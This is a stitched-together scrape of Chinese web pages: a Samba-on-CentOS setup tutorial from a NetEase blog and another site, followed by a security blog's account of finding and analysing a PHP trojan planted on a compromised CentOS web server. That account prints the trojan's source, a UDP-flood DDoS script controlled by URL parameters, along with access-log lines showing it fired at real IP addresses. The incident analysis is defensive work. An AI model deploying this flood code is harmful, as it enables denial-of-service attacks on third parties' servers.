跟《养女遇上高富帅101次抢婚,101次抢婚》类似的小说,最好是有百度云资源的

温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
yum install samba配置 Samba  然后,通过编辑 /etc/samba/smb.conf ,根据需求配置 Samba。在这里,本文的原则是只将文件共享应用于内网,并让将要被共享的目录拥有充分的读写权限属性。如果是普通的用户的话,一定要有smb账号smbpasswd -a it01添加一个it01的账号给smb服务器smbpasswd -e it01查看用户是否存在testparm 简单测试配置是否正确chmod 0755 /it01修改文件夹权限下面是网摘CentOS下Samba服务的配置&本文源于网络上的各种教程,但是结合自己的实际情况,个别细节的地方修改了一下。&
&虽然简单,但是我相信好记性不如烂笔头,先记录下来,方便大家,也方便自己。&Samba是与Window实现网络共享的一种常用方法。&一旦配置好了,Windows用户就可以访问Linux服务器的共享目录,&实现跨系统的文件传输。&与FTP相比,Samba更加灵活,方便。&下面给出在CentOS下配置Samba服务器的两种方法。&如果个人研究,请使用方法1,如果是正式的开发,请参照方法2。&&&■方法1: 不限制用户的方式(不安全)&确认需要安装的rpm:&1 & &~# rpm -qa|grep samba2samba-client-3.5.10-114.el6.i6863samba-3.5.10-114.el6.i6864samba4-libs-4.0.0-23.alpha11.el6.i6865samba-winbind-3.5.10-114.el6.i6866samba-winbind-clients-3.5.10-114.el6.i6867samba-common-3.5.10-114.el6.i6868# 如果没有的话,需要重新安装&首先给linux设一个ip,要和是一个网段的&1 & &~# mkdir /share ---------------在根下创建文件夹(除了root的目录下不能创建其他都可以)2~# chmod 777 /share/ ------------给share文件夹赋权3~# vi /etc/samba/smb.conf ------------(编辑samba下的smb.conf文件)&编辑 & security = share & ----------一般在第58行&编辑最后面的 286 [weihaiyang]&& & & & & & &287 & &comment = share&& & & & & & &288 & &path =/share&& & & & & & &289 & &valid users = nobody&& & & & & & &290 & &public = yes&& & & & & & &291 & &writable = yes&& & & & & & &292 & &printable = no&& & & & & & &293 & &create mask = 0765 (前面的数字是行数)&1 & &~# service smb restart #重启smb服务&然后在windows下的“运行”里输入linux的\\ip就OK了&&■方法2: 带有用户认证的方式(CentOS 6.2)(安全,适用于生产环境)&&1.配置防火墙&&使用Samba服务器的话,需要开放一下端口:&& UDP 137&& UDP 138&& TCP 139&& TCP 445&1# vi /etc/sysconfig/iptables # 配置防火墙端口2-A INPUT -m state --state NEW -m tcp -p tcp --dport 139 -j ACCEPT3-A INPUT -m state --state NEW -m tcp -p tcp --dport 445 -j ACCEPT4-A INPUT -m state --state NEW -m tcp -p tcp --dport 137 -j ACCEPT5-A INPUT -m state --state NEW -m tcp -p tcp --dport 138 -j ACCEPT6 & &7~# service iptables restart # 重启防火墙&2.检查Samba包是否已经安装&1~# rpm -qa|grep samba2samba-winbind-clients-3.5.10-114.el6.x86_643samba4-libs-4.0.0-23.alpha11.el6.x86_644samba-client-3.5.10-114.el6.x86_645samba-common-3.5.10-114.el6.x86_64说明Samba已经安装,如果没有安装,运行下面的命令&1~# rpm -ivh samba-3.5.10-114.el6.x86_64.rpm2& & & & & &samba4-libs-4.0.0-23.alpha11.el6.x86_64.rpm3& & & & & &samba-client-3.5.10-114.el6.x86_64.rpm4& & & & & &samba-common-3.5.10-114.el6.x86_64.rpm5& & & & & &samba-winbind-3.5.10-114.el6.x86_64.rpm6 & && & & & & &samba-winbind-clients-3.5.10-114.el6.x86_64.rpm上面的命令在实际执行的时候没有换行的,请在一行内完成&&3.配置Samba&1~# chkconfig smb on # 设置samba开机启动2~# service smb start # 启动Samba服务3~# service smb restart # 再启动Samba服务4~# service smb stop # 停止Samba服务&备份配置文件:&1~# cp /etc/samba/smb.conf /ete/samba/smb.confbak&编辑配置文件:&01~# vi /etc/samba/smb.conf02[global] #找到这一行,全局配置标签,在此行下面前景如下内容03 & &workgroup = WORKGROUP # 工作组名称改为Windows网络所定义的工作组名04server string = Samba Server # 设置Samba服务器的主机名称05security = user # 设置Samba服务器安全级别为user,即已账号和口令访问06#在配置文件的末尾添加下面的自定义内容07[SambaServer]08comment = SambaServer #在Windows网上邻居中看到的共享目录的名字09path = /home/SambaServer #共享目录在系统中的位置10public = no #不公开目录11writable = yes #共享目录可以读写12valid users = SambaUser #只容许SambaServer用户访问保存配置&&4.添加访问Linux共享目录的账号SambaServer&用户目录为 /home/SambaServer,用户登陆终端设置为/bin/false(使之不能登陆)&1 & &~# cd /home2~# mkdir SambaServer3~# cd SambaServer4~# touch samba.txt #建立测试文件5~# useradd SambaServer -d /home/SambaServer -s /bin/false6~# chown SambaServer:SambaServer /home/SambaServer -R&5.将用户SambaServer加入到Samba用户中,并设置登陆共享目录的密码为:123456&view sourceprint?1~# smbpasswd -a SambaServer2New SMB password: #输入该用户用于登陆Samba的密码3Retype new SMB password: #再次输入该密码4Added user SambaServer5# 特别注意: 这里设置的密码是用户登陆Samba共享目录的密码,不是用户登陆Linux系统的密码&
&6.重启Samba服务&1~# service smb restart&7.在Windows客户端访问&输入 \\ip 或者 &\\Samba Server #服务器的名称&回车之后,会跳出来登陆框,输入用户名:SambaServer,密码:123456&即可访问共享目录。&以上,CentOS下,Samba服务器的配置完成。
阅读(2154)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'smb centos配置',
blogAbstract:'安装yum install samba配置 Samba  然后,通过编辑 /etc/samba/smb.conf ,根据需求配置 Samba。在这里,本文的原则是只将文件共享应用于内网,并让将要被共享的目录拥有充分的读写权限属性。如果是普通的用户的话,一定要有smb账号smbpasswd -a it01添加一个it01的账号给smb服务器smbpasswd -e it01查看用户是否存在testparm 简单测试配置是否正确chmod 0755 /it01修改文件夹权限下面是网摘',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:5,
publishTime:4,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}CentOS上如何使用Samba共享文件夹
CentOS上如何使用Samba共享文件夹
学习啦【Linux教程】 编辑:春健
  常常使用Windows的人可能会发现,Windows之前共享资料非常方便,那么大家知道CentOS上如何使用Samba共享文件夹?下文学习啦小编就分享了CentOS上使用Samba共享文件夹的方法,希望对大家有所帮助。
  CentOS上使用Samba共享文件夹方法
  步骤1:在Fedora和CentOS上安装Samba
  首先,安装Samba以及进行一些基本的配置。
  检验Samba是否已经安装在您的系统中:
  $ rpm -q samba samba-common samba-client
  如果上面的没有任何输出,这意味着Samba并未安装。这时,应使用下面的命令来安装Samba。
  $ sudo yum install samba samba-common samba-client
  接下来,创建一个用于在网络中共享的本地文件夹。这个文件夹应该以Samba共享的方式导出到远程的用户。在这个指南中,我们会在顶层文件夹'/'中创建这个文件夹,因此,请确保您有相应的权限。
  $ sudo mkdir /shared
  如果您想在您的home文件夹内创建共享文件夹(例如,~/shared),您必须激活SE中Samba的home文件夹共享选项,具体将在后面提到。
  在创建/shared文件夹后,设置文件夹权限以保证其余用户可以访问它。
  $ sudo chmod o+rw /shared
  如果您不想其他用户对该文件夹拥有写权限,您需要移除命令中的'w'选项。
  $ sudo chmod o+r /shared
  接下来,创建一个空文件来测试。这个文件可以被用来验证Samba的共享已经被挂载。
  $ sudo touch /shared/file1
  步骤2:为Samba配置SELinux
  接下来,我们需要再次配置SELinux。在Fedora和CentOS发行版中SELinux是默认开启的。SELinux仅在正确的安全配置下才允许Samba读取和修改文件或文件夹。(例如,加上'sambasharet'属性标签)。
  下面的命令为文件的配置添加必要的标签:
  $ sudo semanage fcontext -a -t samba_share_t &(/.*)?&
  将替换为我们之前为Samba共享创建的本地文件夹(例如,/shared):
  $ sudo semanage fcontext -a -t samba_share_t &/shared(/.*)?&
  我们必须执行restorecon命令来激活修改的标签,命令如下:
  $ sudo restorecon -R -v /shared
  为了通过Samba共享在我们home文件夹内的文件夹,我们必须在SELinux中开启共享home文件夹的选项,该选项默认被关闭。下面的命令能达到该效果。如果您并未共享您的home文件夹,那么您可以跳过该步骤。
  $ sudo setsebool -P samba_enable_home_dirs 1
  步骤3:为Samba配置
  下面的命令用来打开防火墙中Samba共享所需的TCP/UDP端口。
  如果您在使用firewalld(例如,在Fedora和CentOS7下),接下来的命令将会永久的修改Samba相关的防火墙规则。
  $ sudo firewall-cmd --permanent --add-service=samba
  如果您在防火墙中使用iptables(例如,CentOS6或者更早的版本),可以使用下面的命令来打开Samba必要的向外的端口。
  $ sudo vi /etc/sysconfig/iptables
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 445 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 445 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 137 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 138 -j ACCEPT-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 139 -j ACCEPT
  然后重启iptables服务:
  $ sudo service iptables restart
  步骤4:更改Samba配置
  后面的步骤用来配置Samba以将本地文件夹导出为Samba共享文件夹。
  使用文件编辑器打开Samba配置文件,并将下面的行添加到文件的末尾。
  $ sudo nano /etc/samba/smb.conf
  [myshare]comment=my shared filespath=/sharedpublic=yeswriteable=yes
  上面在括号内的文本(例如,&myshare&)是Samba共享的资源的名字,它被用来从远程主机存取Samba共享。
  创建Samba用户帐户,这是挂载和导出Samba文件系统所必须的。我们可以使用smbpasswd工具来创建一个Samba用户。注意,Samba用户帐户必须是已有的Linux用户。如果您尝试使用smbpasswd添加一个不存在的用户,它会返回一个错误的消息。
  如果您不想使用任何已存在的Linux用户作为Samba用户,您可以在您的系统中创建一个新的用户。为安全起见,设置新用户的登录脚本为/sbin/nologin,并且不创建该用户的home文件夹。
  在这个例子中,我们创建了一个名叫&sambaguest&的用户,如下:
  $ sudo useradd -M -s /sbin/nologin sambaguest$ sudo passwd sambaguest
  在创建一个新用户后,使用smbpasswd命令添加Samba用户。当这个命令询问一个密码时,您可以键入一个与其用户密码不同的密码。
  $ sudo smbpasswd -a sambaguest
  激活Samba服务,并检测Samba服务是否在运行。
  $ sudo systemctl enable smb.service $ sudo systemctl start smb.service $ sudo systemctl is-active smb
  使用下面的命令来查看Samba中共享的文件夹列表。
  $ smbclient -U sambaguest -L localhost
  接下来是在Thunar文件管理器中访问Samba共享文件夹以及对file1进行拷贝复制的截图。注意,Samba的共享内容可以通过在Thunar中通过 smb:///myshare 这个地址来访问。
CentOS上如何使用Samba共享文件夹相关文章:
[CentOS上如何使用Samba共享文件夹]相关的文章
看过本文的人还看了
748人看了觉得好
953人看了觉得好
952人看了觉得好
【Linux教程】图文推荐致力于安全研究 程序开发 投资理财
您的位置 >>
>> Centos服务器被挂马的一次抓马经历
Centos服务器被挂马的一次抓马经历
发表于5年前
| 作者: seay | 分类:
| 孵化于:日 | 文章热度:10,924 次
显示不全请点击全屏阅读
今天早上五点,收到监控宝的警告短信,说是网站M无法访问了。睡的正香,再说网站所在系统是centos,重要数据每天都备份,应该很安全,也没有在意。倒头接着睡觉去了。
早上九点,机房负责人直接给我打来电话,说是全机房网络巨慢,单位的所有网站都打不开或打开的很慢。Centos服务器被挂马的一次抓马经历
我赶紧赶了过去,查看了一下那里网络,发现175服务总是以50M/S速度向外发包,而175服务器正是网站M所在的服务器。
果断SSH连接175服务器,发现175服务器连接也很慢,连上之后top一下,查看cpu负载:
发现有两个apache进程占用cpu一直在40%以上,马上停止httpd 服务
service httpd stop
停止httpd服务之后,再看网络状态,175服务器也不向外发包了,一切正常。
由此判断应该是175服务器挂了马,疯狂向外发包,挤占了全部机房带宽。
下一步就是抓马了!
175服务器是有硬件防火墙,只开http80跟ssh22端口,ssh不太可能被盗号,应该是通过web漏洞挂马。早上5点才中招的,木马程序文件应该在1天之内。
切到M站点根目录之下,查找最近一天内变动的文件,执行
find ./ -mtime -1
果然,一个名为phzLtoxn.php的可疑文件出现在目录列表中。查看一下木马程序的创建者,执行
phzLtoxn.php
这里发现文件就没了,难道这文件还会自我销毁?Centos服务器被挂马的一次抓马经历
原来发生了一个小插曲,隔壁的管理员小黄也注意到这个文件,二话不说就删除了。我过去劈头批评教育了小黄一顿。见了木马程序就知道删删删删!难道木马程序不会再生成啊?你得顺藤摸瓜,不是一刀切。你得找到漏洞源头!删了没办法,再把httpd服务开启了,引狼入室,等等看能否再生成。
果然,半小时不到,新的phzLtoxn.php文件又生成了。查看了一下,文件创建者是apache,由此判断这肯定是通过网站漏洞上传的。
分析一下木马文件,看下黑客意图
这里贴出phzLtoxn.php文件源代码,并作了简单注释,仅作学习之用。
//设置脚本运行时间
set_time_limit(999999);
//攻击目标服务器ip
$host = $_GET[‘host’];
//攻击目标服务器端口
$port = $_GET[‘port’];
//攻击时长
$exec_time = $_GET[‘time’];
//每次发送字节数
$Sendlen = 65535;
$packets = 0;
//设置客户机断开不终止脚本的执行
ignore_user_abort(TRUE);
//step1. 目标服务器$host、端口$port、运行时长$exec_time有效性
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {
if (StrLen($_GET[‘rat’]) && 0) {
echo $_GET[‘rat’] . $_SERVER[“HTTP_HOST”] . “|” . GetHostByName($_SERVER[‘SERVER_NAME’]) . “|” . php_uname() . “|” . $_SERVER[‘SERVER_SOFTWARE’] . $_GET[‘rat’];
echo “Warning to: opening”;
//step2. 设定发字符串$out,这里是“AAAAAAAAAA…”
for ($i = 0; $i & $S $i++) {
$out .= “A”;
$max_time = time() + $exec_
//step3. 进行攻击,使用udp向目标服务器狠狠发串串
while (1) {
$packets++;
if (time() & $max_time) {
$fp = fsockopen(“udp://$host”, $port, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
//step4. 攻击统计
echo “Send Host $host:$port&br&&br&”;
echo “Send Flow $packets * ($Sendlen/1024=” . round($Sendlen / 1024, 2) . “)kb / 1024 = ” . round($packets * $Sendlen / 1024 / 1024, 2) . ” mb&br&&br&”;
echo “Send Rate ” . round($packets / $exec_time, 2) . ” packs/s” . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . ” mb/s”;
从以上代码可以看出,是个典型的ddos攻击代码。黑客应该是把我们服务器当傀儡使用,组织大量傀儡服务器疯狂向目标服务器发包。黑客只需要打开浏览器,敲入/phzLtoxn.php?host=x.x.x.x&port=xx&time=xx就可以对目标服务器进行ddos攻击了。
查看httpd日志,分析下攻击ip源,执行
[plain] view plaincopy
tail /var/log/httpd/access.log | grep phzLtonxn.php
183.12.75.240 – – [10/Aug/:46 +0800] “GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/:56 +0800] “GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/:58 +0800] “GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/:08 +0800] “GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/:12 +0800] “GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/:27 +0800] “GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/:27 +0800] “GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/:27 +0800] “GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/:27 +0800] “GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/:28 +0800] “GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1&#0 “-” “Mozilla/4.0 ( MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
发现源ip来自多个,目标服务器ip也有多个,都属于很多国家,有点奇怪啊,为什么黑客没有针对性的攻击呢,无聊的黑客啊。
下一步,找漏洞!
1、重新审视了M站目录下文件权限。仅对几个必要的缓存、静态化的目录为apache开启了写权限,防止phzLtoxn.php文件再次生成。
2、重新开启httpd服务,使用360网站检测对H站进行漏洞检测,发现M站中有严重的远程执行漏洞,于是赶紧打了补丁。
3、补丁打好之后,顺便修改了系统用户、数据库用户、ftp用户的密码、M站系统用户密码。
观察几日之后,一切正常。
小结一下几个安全原则
1、权限最小化。
web目录一定做好权限,仅仅对apache开几个必要文件夹的写权限。
2、时刻注意补丁更新。
经常使用第三方的网站安全检测工具,也可参考十大安全评估工具,如果网站系统使用了第三方常用程序,多注意一下乌云漏洞平台的信息
3、中招后一定要补牢。
别光删删删删,要查找中招源头,分析黑客目的。
* 作者:叶文涛 (专注php开发、linux运维、系统架构)
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
马上分享给你的朋友吧~
博主猜你喜欢
博主向你推荐
2012 年 8 月 25 日 上午 4:46
不错的分析!!!
评论内容(必填)
有人回复时邮件通知我
微信扫一扫
浏览187,960 次 浏览103,410 次 浏览86,698 次 浏览77,664 次 浏览73,267 次 浏览66,926 次

我要回帖

更多关于 高富帅101次抢婚 的文章

 

随机推荐